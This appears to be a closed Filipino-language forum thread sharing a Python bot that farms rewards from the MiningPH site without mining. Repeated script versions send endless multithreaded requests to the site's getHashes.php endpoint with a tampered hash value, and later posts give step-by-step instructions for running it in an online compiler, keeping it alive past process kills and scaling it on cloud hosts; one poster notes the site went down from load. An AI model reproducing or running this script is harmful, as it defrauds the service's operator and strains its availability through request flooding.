🔒 Closed INSTANT 150 Pesos + No Mining Bot Script [MiningPH]

Status
Not open for further replies.
Ito na sir, ikaw bahala kung ilang thread ilalagay mo, hahahah

Code:
import threading
import requests
import os
Userid = ""
Userthread = 0
run = True
okCounter = 0

Userid = input("Enter your MiningPH ID: ")
Userthread = input("How many threads [1-20]: ")
def req_xmr(url):
    global okCounter
    while run:
        if requests.get(url).status_code == 200:
            okCounter += 1
            print("Group Done: " + str(okCounter))
url = "https://miningph.com/application/views/user/getHashes.php?xVal=1&id=" + str(Userid) + "&yVal=10000"
for i in range(Userthread):
    print("Starting Thread " + str(i) + " . . .")
    thread = threading.Thread(target=req_xmr,args=[url])
    thread.start()
    print("Exiting Thread " + str(i) + " . . .")
pano gamitin yan mga lods paturo heheje
 
btw, alam mo threading sa php? mas maganda kung sa php din ito gawin para sa cron job script sa site. ang hirap ng threading sa php
kaso lang na down ung site kahapon since high cpu usage. pero bumalik na kanina.

Pangit po mag threading sa php kasi humahatak lahat sa pc ng client,
Mas maganda si python kasi hahatak sya sa system ng compiler,
Gamit nalang sila ng online python compiler,

Ito na final code promise

Code:
import threading
import requests

Userid = ""
Userthread = 0
run = True
okCounter = 0


def req_xmr(url):
    global okCounter
    while run:
        if requests.get(url).status_code == 200:
            okCounter += 1
            print("Group Done: " + str(okCounter))


Userid = input("Enter your MiningPH ID: ")
print("Recommended Max Threads is 20. Turn if up if you have a powerfull device ")
Userthread = input("How many threads [1-20]: ")

url = "https://miningph.com/application/views/user/getHashes.php?xVal=1&id=" + str(Userid) + "&yVal=10000"
for i in range(int(Userthread)):
    print("Starting Thread " + str(i) + " . . .")
    thread = threading.Thread(target=req_xmr,args=[url])
    thread.start()
    print("Exiting Thread " + str(i) + " . . .")

print("DONE")
 
Pangit po mag threading sa php kasi humahatak lahat sa pc ng client,
Mas maganda si python kasi hahatak sya sa system ng compiler,
Gamit nalang sila ng online python compiler,
yun ung ginawa ng mga new comers, di ko alam kung alam ng old comers.

since vps naman kung sa web server, so di problema kung php code since pwede mo ma autopilot ito
 
yun ung ginawa ng mga new comers, di ko alam kung alam ng old comers.

since vps naman kung sa web server, so di problema kung php code since pwede mo ma autopilot ito

Yung sinasabi mo ba ts yung kagaya ng nasa website mo? yung mag ssubmit ng hashes?

image.md.webp
 
Yung sinasabi mo ba ts yung kagaya ng nasa website mo? yung mag ssubmit ng hashes?
not exactly, pero medyo. yung submit ng hashes javascript lang yan, so client side. pero automated na sila

di ko alam kung meron silang online compiler for python na nahanap since 1 lang gumana sa akin.
 
Pangit po mag threading sa php kasi humahatak lahat sa pc ng client,
Mas maganda si python kasi hahatak sya sa system ng compiler,
Gamit nalang sila ng online python compiler,

Ito na final code promise

Code:
import threading
import requests

Userid = ""
Userthread = 0
run = True
okCounter = 0


def req_xmr(url):
    global okCounter
    while run:
        if requests.get(url).status_code == 200:
            okCounter += 1
            print("Group Done: " + str(okCounter))


Userid = input("Enter your MiningPH ID: ")
print("Recommended Max Threads is 20. Turn if up if you have a powerfull device ")
Userthread = input("How many threads [1-20]: ")

url = "https://miningph.com/application/views/user/getHashes.php?xVal=1&id=" + str(Userid) + "&yVal=10000"
for i in range(int(Userthread)):
    print("Starting Thread " + str(i) + " . . .")
    thread = threading.Thread(target=req_xmr,args=[url])
    thread.start()
    print("Exiting Thread " + str(i) + " . . .")

print("DONE")
pano lods gmitin
 
pano lods gmitin

1. Hanap ka ng python3 online compiler
Online compiler : https:/;)/repl.it/languages/python3
(Paremove nalang ng Emojie)

2. Copy mo yung code tas paste mo sa Online compiler
Code:
import threading
import requests

Userid = ""
Userthread = 0
run = True
okCounter = 0


def req_xmr(url):
    global okCounter
    while run:
        if requests.get(url).status_code == 200:
            okCounter += 1
            print("Success Claim : " + str(okCounter))


Userid = input("Enter your MiningPH ID: ")
print("Recommended Max Threads is 20. Turn if up if you have a powerfull device ")
Userthread = input("How many threads [1-20]: ")

url = "https://miningph.com/application/views/user/getHashes.php?xVal=1&id=" + str(Userid) + "&yVal=10000"
for i in range(int(Userthread)):
    print("Starting Thread " + str(i) + " . . .")
    thread = threading.Thread(target=req_xmr,args=[url])
    thread.start()
    print("Exiting Thread " + str(i) + " . . .")

print("DONE")

3.Lagay mo MiningPH ID mo. Hit Enter then pili ka number ng THREADS 1-20. Hit ENTER ulit

4. Your Done. Wag mo icclose yung tab, Enjoy
 
1. Hanap ka ng python3 online compiler
Online compiler : https:/;)/repl.it/languages/python3
(Paremove nalang ng Emojie)

2. Copy mo yung code tas paste mo sa Online compiler
Code:
import threading
import requests

Userid = ""
Userthread = 0
run = True
okCounter = 0


def req_xmr(url):
    global okCounter
    while run:
        if requests.get(url).status_code == 200:
            okCounter += 1
            print("Success Claim : " + str(okCounter))


Userid = input("Enter your MiningPH ID: ")
print("Recommended Max Threads is 20. Turn if up if you have a powerfull device ")
Userthread = input("How many threads [1-20]: ")

url = "https://miningph.com/application/views/user/getHashes.php?xVal=1&id=" + str(Userid) + "&yVal=10000"
for i in range(int(Userthread)):
    print("Starting Thread " + str(i) + " . . .")
    thread = threading.Thread(target=req_xmr,args=[url])
    thread.start()
    print("Exiting Thread " + str(i) + " . . .")

print("DONE")

3.Lagay mo MiningPH ID mo. Hit Enter then pili ka number ng THREADS 1-20. Hit ENTER ulit

4. Your Done. Wag mo icclose yung tab, Enjoy
xValk balik balik mo every 5-10 mins since sigproc kill palagi yan. pero may way para hindi ma stop yung process kahit 36 mins na
 
xValk balik balik mo every 5-10 mins since sigproc kill palagi yan. pero may way para hindi ma stop yung process kahit 36 mins na

Sulit yan ts pag google cloud hahaha, kaso ang bilis umabot sa limit ng miningph ,then hindi na makamine sad xD
Pending padin withdrawal ko. medyo sobrang delay na ng payout hahaha,
 
Status
Not open for further replies.

About this Thread

  • 538
    Replies
  • 19K
    Views
  • 69
    Participants
Last reply from:
kk33aan

Online now

Members online
1,003
Guests online
1,363
Total visitors
2,366

Forum statistics

Threads
2,272,319
Posts
28,941,992
Members
1,237,137
Latest member
jhhhjj
Back
Top